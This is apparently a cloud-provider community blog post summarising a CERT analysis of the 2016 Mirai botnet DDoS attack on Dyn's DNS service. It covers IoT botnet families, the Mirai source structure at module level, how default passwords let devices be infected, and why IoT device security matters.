Community Blog CERT Analysis on IoT Botnet and DDoS Attacks

CERT Analysis on IoT Botnet and DDoS Attacks

This article discusses the importance of IoT device security by looking at CERT's interpretation of the infamous 2016 DDoS attack.

On October 21, 2016, a DDoS attack hit the DNS service provider Dyn. The company is a major DNS provider for many companies in the United States.

In the morning of the attack, Dyn confirmed that its DNS infrastructure located in the East Coast had suffered DDoS attacks from all over the world. The attacks severely affected the business of Dyn's DNS customers, and even worse, websites of customers became inaccessible. These attacks lasted until 13:45 PM ET. Dyn said on its official website that it would track down this issue and release the incident report.


Services affected by this attack included Twitter, Etsy, Github, Soundcloud, Spotify, Heroku, PagerDuty, Shopify, and Intercom. Access to popular websites like PayPal, BBC, Wall Street Journal, Xbox, CNN, HBO Now, Starbucks, New York Times, The Verge, and Financial Times was also affected.

Initial Analysis of the Attack

In response, the Computer Emergency Response Team (CERT) initiated an advanced analysis process to follow up and analyze the DDoS attack. According to the CERT analysis, this incident involved multiple factors particularly IoT device security vulnerabilities. In addition to the DDoS attack and DNS security on the surface, there were still many other issues that are worth greater attention and further research.

Dyn said that this DDoS attack involved tens of millions IP addresses, most of which were IoT and smart devices. Dyn believed that the attack came from a malicious code named "Mirai." Hacker organizations NewWorldHackers and Anonymous claimed responsibility for the attack .

CERT Analysis on Botnets

The scale of botnets that rely on IoT devices is continuously increasing. Typical IoT DDoS botnet families include the CCTV series that appeared in 2013, ChiekenMM series (including 10771, 10991, 25000, and 36000), and Linux-based cross-platform DDoS botnet families (such as BillGates, Mayday, PNScan, and Gafgyt). CERT has named these Trojans as follows:

Family Variant quantity Sample HASH quantity
Trojan[DDoS]/Linux.Mirai 2 Greater than100
Trojan[DDoS]/Linux.Xarcen 5 Greater than1000
Trojan[DDoS]/Linux.Znaich 3 Greater than500
Trojan/Linux.PNScan 2 Greater than50
Trojan[Backdoor]/Linux.Mayday 11 Greater than1000
Trojan[DDoS]/Linux.DnsAmp 5 Greater than500
Trojan[Backdoor]/Linux.Ganiw 5 Greater than3000
Trojan[Backdoor]/Linux.Dofloo 5 Greater than2000
Trojan[Backdoor]/Linux.Gafgyt 28 Greater than8000
Trojan[Backdoor]/Linux.Tsunami 71 Greater than1000
Worm/Linux.Moose 1 Greater than10
Worm[Net]/Linux.Darlloz 3 Greater than10

In this incident, the primary victims infected with Mirai were IoT devices, including routers, network cameras, and DVRs. As early as 2013, organizations engaged in DDoS cyber crimes started to shift targets for capturing botnet hosts from Windows to Linux, and from x86 Linux servers to IoT devices with the embedded Linux operating system. Mirai means "future" in Japanese. R&D staff names the new variant "Hajime," which means "beginning" in Japanese.

CERT has captured and analyzed a large number of malicious samples related to smart devices and routers, and worked with related authorities to collect field evidence from some devices. These devices mainly use the MIPS and ARM architectures in which attackers have implanted Trojans due to the existence of such factors as default passwords, weak passwords, serious vulnerabilities that do not get fixed in time. Due to mass production and deployment of IoT devices and insufficient competence of integrators and O&M staff in many application scenarios, a significant proportion of devices use default passwords and vulnerabilities cannot get fixed in time.

Mode of the Attack

Domain Name System (DNS) is a server that converts between domain names and corresponding IP addresses. DNS stores a domain name and IP address mapping table to resolve domain names in messages. Target websites get visits according to the resolution results. If DNS receives a DDoS attack, it cannot resolve domain names properly, and therefore users cannot visit the related target websites.

In DDoS attacks (including Mirai) targeted at IoT devices, attackers perform brute-force cracking on popular password files through the Telnet port, or log on using the default password. If attackers successfully log on through Telnet, they attempt to use the necessary embedded tools like BusyBox and wget to download the bot of the DDoS function, modify executable attributes, and run and control IoT devices. Due to the difference of the CPU command architectures, after determining the system architecture, some botnets can select samples of the MIPS, arm, or x86 architectures for downloading. After running these samples, botnets receive related attacks commands to initiate attacks.

The following weak password can exist in a Mirai sample:


In previous tracking and analysis of IoT botnets, CERT found that many popular devices including DVR, network camera, and smart router brands had the default password problem.

Analysis of the Mirai Botnet

The related source code of the Mirai botnet was released on the Hackerforums by a user "Anna-senpai" on September 30, 2016. The user claimed that the code was released to encourage users to pay more attention to the security industry. After the code was released, the related technology got immediately applied to other malicious software projects. On October 4, 2016, this code was uploaded to GitHub and soon forked for more than 1000 times.

CERT analyzed the Mirai source code uploaded to GitHub on October 4, 2016, and sorted out its code structure:

The leaked Mirai source code mainly consists of two parts:

  1. Loader: The loader stores the executable files that get compiled for each platform and is used to load the actual Mirai attack program.
  2. Mirai: Mirai is the program that hackers use to implement the attack. It has two parts: bot (controlled end, which is compiled using the C language) and cnc (control end, which is compiled using the Go language).

The following modules are available at the bot end:

Module file name Module function
attack.c Used for attacks. The called attack sub-module gets defined in other attack_xxx.c files.
checksum.c Calculates the checksum.
killer.c Ends a process.
main.c Main module calls other sub-modules.
rand.c Generates random numbers.
resolve.c Resolves domain names.
scanner.c It can scan devices that can be attacked, for example, by using weak passwords, on the network.
table.c Stores encrypted domain name data.
util.c Provides some practical tool.

Similar "open source" behaviors provide extreme bad demonstration effects, and will further reduce the costs for other attackers to attack IoT devices. Therefore, this article does not intend to interpret this code.

CERT's Monitoring on IoT Botnets

The situation awareness and monitoring system of CERT can continuously monitor sample transmission, online control, and attack commands of botnets. In addition to Mirai-related incidents, we also find attacks initiated by IoT botnets against other targets.

Attack start time and end time Sample family (named by the original factory) Attack target Attack type
2016-10-22 9:36:48 Family Mayday 203.195..:15000 Guangzhou Tencent tcp flood
2016-10-20 8:12:57 Family DDoS www.52*.com XXX
2016-10-20 1:36:20 Family DDoS www.ssh*.com/user.php Shenzhen XXX company
2016-10-9 18:52:35 Family Billgates 121.199.. Hangzhou XX cloud
2016-9-5 10:57:00 Family Billgates 59.151.. Beijing XX

Before 2014, weak passwords were often scanned to implant malicious codes on IoT devices using the Linux system. Since the appearance of the Shell Shock (CVE-2014-6271), this vulnerability was commonly used on the Internet to scan and implant malicious codes. According to the information captured by the CERT Beeswarm system, the number of Linux host intrusion incidents increased significantly since the appearance of the Shell Shock.

The first Shell Shock infection incident detected by CERT occurred in September 2014. Later, CERT published multiple malicious code analysis reports related to IoT devices, such as the Analysis of DYREZA Family Variants Spread Using Routers and Hackers Using HFS to Build Servers and Spread Malicious Codes. Another report, Trojan [DDOS]/Linux. Znaich Analysis Report was not published at that time and now appends to this report. Attackers also used a few other vulnerabilities that can obtain host permissions.

Opinions from the CERT Analysis Team

The CERT analysis team believes that IoT botnets spread quickly due to a combination of the following factors:

  1. The number of online IoT devices are increasing substantially with the rapid development of IoTs ranging from smart homes to smart cities.
  2. Windows is the mainstream desktop operating system. With the continuous enhancement of memory security (such as DEP, ASLR, and SEHOP) capabilities of Windows, it is increasingly difficult to break down the Windows system through a remote open port. In contrast, if malicious codes get injected through IoT devices without strict security design, the success rate is much higher.
  3. Most IoT devices do not get embedded with any security mechanisms, and a lot of them do not get placed within the traditional IT network. That is, they are beyond the control of the security perception ability. These devices cannot efficiently respond to problems as they happen.
  4. IoT devices often stay online for 24 hours a day and are more stable attack sources than the desktop Windows system.

CERT expounded the view that threats will be spread and generalized in an in-depth manner with the development of Internet Plus, and used the word "Malware/Other" to explain that security threats evolve towards the new fields such as smart devices. As what we are worried about, security threats are now everywhere from smart cars, smart homes, smart wearable devices, to smart cities.

Therefore, in this large-scale DDoS incident targeted Dyn's DNS, CERT attaches more importance to IoT security problems exposed. Although the DNS often gets regarded as the Achilles' heel of the Internet, we should not forget that interworking on the Internet relies on IP addresses, and domain names are generated merely to facilitate memory of users. For most users of the large industries in North America, VPNs and IP addresses get widely used for the connection, and the primary system operation does not rely on the DNS service. Therefore, even though such a heavy-traffic DDoS attack brings inconvenience to netizens when they access websites for a period, it cannot shake the North America social operation and Internet foundation.

The Importance of Device Security in IoT

Undoubtedly, the DNS is an information infrastructure, but the IoT botnet is not merely a tool for initiating this attack. IoT is an Internet of Things, and also an essential supporting node in the future information society. IoT is a network extended and expanded based on the Internet. It is not merely a network. IoT can use the embedded sensors, devices, and systems that adopt the awareness and information sensing technologies to build complex applications that involve the physical, social space.

Many devices where these applications are placed are necessary infrastructure devices on the critical nodes that maintain the livelihood of the people, or even basic sensors of critical industrial control facilities. Intruding these devices provides more in-depth resource values, and is more dangerous than using these devices to initiate DDoS attacks. The existence of vulnerabilities in a large area on the IoT brings more concealed and dangerous social security risks and national security risks, except that it is difficult to perceive these type of threats.

It is natural to use the public influence as the significant indicator for evaluating the impact of cybersecurity incidents. When security threats gradually become directional and more concealed, we should not restrict our focus only on risks that are easy to identify. In this way, more dangerous threats will be let off. Even though the Dyn DDoS attack only affected access to websites, the underlying concept behind the attack can be easily extended to other applications.

CERT has been strengthening security protection of IoT devices, increasing costs for attacking or intruding IoT devices, and enhancing security threat monitoring and alarm of IoT devices. It is similar to what we've done in the last decade to enable the CERT AVL SDK engine to run on tens of thousands of firewalls and billions of mobile phones.


In this article, we discussed the CERT's perspective of how IoT devices are the major targets of security threats concerning the Dyn attack in 2016. The more we are dependent on IoT technology, more important is the security of IoT devices.

With the advances in technology, IoT is in the process of becoming more secure with latest monitoring and intruder prevention systems. CERT is working to win this battle soon and is hoping to secure this revolutionary technology completely.

To learn more about IoT and security, visit www.alibabacloud.com/blog.

0 0 0
Share on

Alibaba Clouder

2,600 posts | 750 followers

You may also like